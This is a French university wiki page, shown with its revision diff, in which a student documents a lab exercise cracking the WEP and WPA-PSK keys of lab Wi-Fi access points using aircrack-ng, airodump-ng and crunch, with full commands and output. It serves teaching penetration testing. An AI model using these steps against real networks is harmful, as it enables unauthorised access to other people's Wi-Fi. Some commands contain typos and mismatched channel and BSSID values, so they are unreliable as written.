TP sysres IMA2a5 2021/2022 G6 : Différence entre versions

De Wiki d'activités IMA
 
(4 révisions intermédiaires par le même utilisateur non affichées)
Ligne 1 : Ligne 1 :
  
== '''1. Tests d’intrusion''' ==
+
=='''Tests d’intrusion'''==
===='''1.1 Cassage de clef WEP d’un point d’accès WiFi'''====
+
====Cassage de clef WEP d’un point d’accès WiFi====
  
 
On branche tout d'abord le module USB Wi-Pi sur la machine.
 
On branche tout d'abord le module USB Wi-Pi sur la machine.
Ligne 52 : Ligne 52 :
 
     Decrypted correctly: 100%
 
     Decrypted correctly: 100%
  
===='''1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi'''====
+
====Cassage de clef WPA-PSK d’un point d’accès WiFi====
  
 
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).
 
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).

Version actuelle datée du 29 novembre 2021 à 12:44

Tests d’intrusion

Cassage de clef WEP d’un point d’accès WiFi

On branche tout d'abord le module USB Wi-Pi sur la machine.

On installe ensuite le paquetage aircrack-ng :

   apt install aicrack-ng

On lit les interfaces disponibles grâce à la commande airmon-ng :

   root@zabeth03:~# airmon-ng
   PHY	   Interface	        Driver		    Chipset
   phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370

On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.

   root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb
   PHY	Interface	Driver		Chipset
   phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370
   Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.
           (mac80211 monitor mode vif enabled on [phy2]wlan0mon
           (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)

Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.

On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :

   root@zabeth09:~# airmon-ng --encrypt wep wlan0mon
   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13

On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.

On récupère ensuite dans un fichier "lcrack" toutes les données concernants la cracotte13 qui transitent sur le canal 3:

   airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon

On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :

   BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13

On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :

   aircrack-ng lcrack.cap

On obtient rapidement la clé WEP :

                                                                                    Aircrack-ng 1.5.2 
                                                                       [00:00:00] Tested 829 keys (got 263651 IVs)
   KB    depth   byte(vote)
   0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) 
   1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) 
   2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) 
   3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) 
   4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) 
            KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]
   Decrypted correctly: 100%

Cassage de clef WPA-PSK d’un point d’accès WiFi

On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).

On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :

   airodump-ng wlan0mon
   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13

On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.

On va stocker environ 10000 trames passants par la kracotte dans un fichier "kracotte.txt" avec la commande suivante :

   airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon

On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :

   crunch 8 8 0123456789 >> Dico_krakotte13.txt

Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :

   split -b 200m Dico_krakotte13.txt

On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :

   aircrack-ng -w xaa Dico_krakotte13.txt-13.cap
   aircrack-ng -w xab Dico_krakotte13.txt-13.cap
   aircrack-ng -w xac Dico_krakotte13.txt-13.cap
   aircrack-ng -w xad Dico_krakotte13.txt-13.cap
   aircrack-ng -w xae Dico_krakotte13.txt-13.cap

Puis on obtient le mot de passe craqué :

                              Aircrack-ng 1.5.2
   [08:04:01] 66637843/102795810 keys tested (958.44 k/s)
   Time left: 10 hours, 29 minutes, 3 seconds                64.83%
                        KEY FOUND! [ 66601666 ]
   Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 
                    18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5
   Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 
                    59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 
                    B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 
                    18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5
   EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10